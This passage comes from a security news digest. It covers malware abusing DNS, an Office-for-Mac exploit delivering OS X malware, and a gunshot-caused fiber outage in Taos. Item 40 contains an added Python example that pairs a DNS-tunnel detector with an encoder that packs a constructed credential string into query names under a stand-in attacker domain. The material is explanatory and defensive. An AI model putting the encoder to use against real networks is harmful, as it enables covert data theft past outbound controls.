40. March 27, Dark Reading – (International) Malware to increasingly abuse DNS. Security researchers have looked at ways to abuse the Domain Name System (DNS) for years. Now, some researchers are warning the protocol may increasingly be used to help criminals communicate with compromised systems. At the RSA Conference in February, a senior security consultant with InGuardians predicted more malware would hide its commands and exfiltrated data in DNS packets. The advantage for malware writers is that, even if a company bars a potentially infected computer from contacting the Internet directly, the machine can still send DNS requests to the company’s own internal resolver, which is permitted to make outbound queries on its behalf. By encoding data in the query names for an attacker-controlled domain, the malware turns that resolver into a proxy that forwards the traffic to the attacker’s name server, bypassing the outbound block. To date, the tactic has been relatively rare: Perhaps a dozen malware variants have used the domain-name system to send commands and updates to botnets. Source:
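The following is an added example, not code from the article or from InGuardians, showing both halves of the DNS covert channel described above: how data is packed into query names under an attacker-controlled domain, and how a defender can spot that pattern in resolver logs. The log format (timestamp, client, query type, name), the domain names, the payload, and all thresholds are constructed for illustration.

```python
# Added example: DNS as a covert channel, exfil encoder and log-based detector.
# Log format, domains, payload and thresholds are illustrative assumptions.
import math
import re
from collections import Counter, defaultdict

# Thresholds are assumptions; tune them against a baseline of your own traffic.
LONG_LABEL = 40          # ordinary labels are rarely this long; hex/base32 chunks are
HIGH_ENTROPY = 3.0       # bits per char; "www", "mail", "docs" sit well below this
RARE_QTYPES = {"TXT", "NULL"}   # roomy record types favoured by tunnels
MIN_UNIQUE_NAMES = 8     # a tunnel needs many distinct names; caching defeats reuse
SUSPICIOUS_RATIO = 0.8   # share of a domain's queries that must carry indicators


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical character distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    """Last two labels. Simplifying assumption: production code should use the
    Public Suffix List so that 'example.co.uk' is not reduced to 'co.uk'."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def encode_exfil(data: bytes, domain: str, chunk_bytes: int = 24) -> list[str]:
    """Malware side: hex-encode data into sequenced labels under `domain`.
    24 bytes -> 48 hex chars + 3-digit sequence = 51 chars, under the 63-octet
    label limit. Every name is unique, so the resolver cannot answer from cache
    and must forward each query to the attacker's authoritative server."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk_bytes)):
        names.append(f"{seq:03d}{data[off:off + chunk_bytes].hex()}.{domain}")
    return names


def query_indicators(qtype: str, qname: str) -> set[str]:
    """Per-query signals; only the part left of the registered domain is scored."""
    sub = qname.rstrip(".").lower().split(".")[:-2]
    found = set()
    if any(len(label) > LONG_LABEL for label in sub):
        found.add("long-label")
    if shannon_entropy("".join(sub)) > HIGH_ENTROPY:
        found.add("high-entropy")
    if qtype.upper() in RARE_QTYPES:
        found.add("rare-qtype")
    return found


LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")  # ts client qtype qname


def parse_log(text: str) -> list[tuple[str, str, str]]:
    """Parse the assumed resolver log format into (client, qtype, qname) tuples."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            _ts, client, qtype, qname = m.groups()
            records.append((client, qtype, qname))
    return records


def detect_tunnels(records) -> dict[str, dict]:
    """Aggregate per registered domain and flag those with many distinct names
    where most queries carry tunnel indicators. Returns domain -> summary."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "suspicious": 0,
                                 "clients": set(), "indicators": Counter()})
    for client, qtype, qname in records:
        s = stats[registered_domain(qname)]
        s["queries"] += 1
        s["names"].add(qname.lower())
        s["clients"].add(client)
        hits = query_indicators(qtype, qname)
        if hits:
            s["suspicious"] += 1
            s["indicators"].update(hits)
    flagged = {}
    for domain, s in stats.items():
        if (len(s["names"]) >= MIN_UNIQUE_NAMES
                and s["suspicious"] / s["queries"] >= SUSPICIOUS_RATIO):
            flagged[domain] = {"queries": s["queries"],
                               "unique_names": len(s["names"]),
                               "clients": sorted(s["clients"]),
                               "indicators": dict(s["indicators"])}
    return flagged


# Constructed sample log: ordinary browsing from one host, a tunnel from another.
BENIGN_LOG = """\
2012-03-27T10:00:01 10.0.0.15 A www.example.com
2012-03-27T10:00:02 10.0.0.15 A mail.example.com
2012-03-27T10:00:03 10.0.0.15 AAAA www.example.org
2012-03-27T10:00:04 10.0.0.15 A cdn1.static.example.net
2012-03-27T10:00:05 10.0.0.15 MX example.com
2012-03-27T10:00:06 10.0.0.15 A docs.example.org
2012-03-27T10:00:07 10.0.0.15 A login.example.org
2012-03-27T10:00:08 10.0.0.15 A api.v2.example.net
2012-03-27T10:00:09 10.0.0.15 A www.example.com
"""
SECRET = b"user=alice;pass=correcthorse;" * 8   # constructed payload, 232 bytes
TUNNEL_LOG = "".join(f"2012-03-27T10:01:{i:02d} 10.0.0.22 TXT {name}\n"
                     for i, name in enumerate(encode_exfil(SECRET, "c2-example.net")))
SAMPLE_LOG = BENIGN_LOG + TUNNEL_LOG


def analyze_sample() -> dict[str, dict]:
    """Run the detector over the constructed log; only c2-example.net is flagged."""
    return detect_tunnels(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for domain, summary in analyze_sample().items():
        print(domain, summary)
```

The detector scores the internal resolver's log rather than the firewall's, because that is where the blocked host's queries are visible. No single indicator is decisive (CDNs use long, high-entropy labels too), so the domain is flagged only on the combination of many distinct names and a high share of suspicious queries; the per-domain summary identifies the client to pull for forensics.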

41. March 27, CNET News – (International) New exploit uses old Office vulnerability for OS X malware delivery. Some malware groups have recently been found to be taking advantage of an old, patched vulnerability in Microsoft Office for OS X in an attempt to spread command-and-control malware to OS X systems. The vulnerability used in the attack was outlined in a Microsoft security bulletin in June 2009, which applied to all versions of Office 2004 version 11.5.4 or earlier, Office 2008 version 12.1.8 or earlier, and OpenXML Converter 1.0.2 or earlier. The vulnerability was patched soon after it was found and currently all supported Office programs are well beyond these versions. However, malware developers are attempting to exploit unpatched systems. These efforts mark the first time Office documents have been used as a vehicle for attacks in OS X. For this attack to work, a person would need to open a maliciously crafted Word file that has likely been distributed via spam and other suspicious means that could easily be avoided. When a maliciously crafted Word file is opened in an unpatched version of Word for Mac, it runs a script that writes the document’s malware payload to the disk and executes a shell script that runs the malware. In addition, it displays a Word document containing a poorly formatted political statement about Tibetan freedoms and grievances. Source:

For another story, see item 42 below in the Communications Sector.

Communications Sector

42. March 28, Taos News – (New Mexico) Gunshot blamed for Taos cell phone, Internet outage. A gunshot was identified as the cause of a cell phone and Internet outage that affected an estimated 7,800 residents in Taos, Questa, Penasco, Red River, Eagle Nest, Angel Fire, Cimarron, and Raton, New Mexico. The outage began just before 7 p.m. March 24. Service was restored by midday March 25. The loss of service was the result of a bullet that apparently cut an overhead fiber optic cable owned by CenturyLink. Several Internet providers and cell phone companies that serve Taos lease space on the same cable. E-mailed outage updates provided by the Public Regulation Commission showed CenturyLink reported that 7,774 residential, business, and government customers were impacted by the cut line. Outage updates from CenturyLink stated that mobile phone customers with Verizon, AT&T, and Sprint all went without service because of the break. Source:

For another story, see item 35 above in the Information Technology Sector.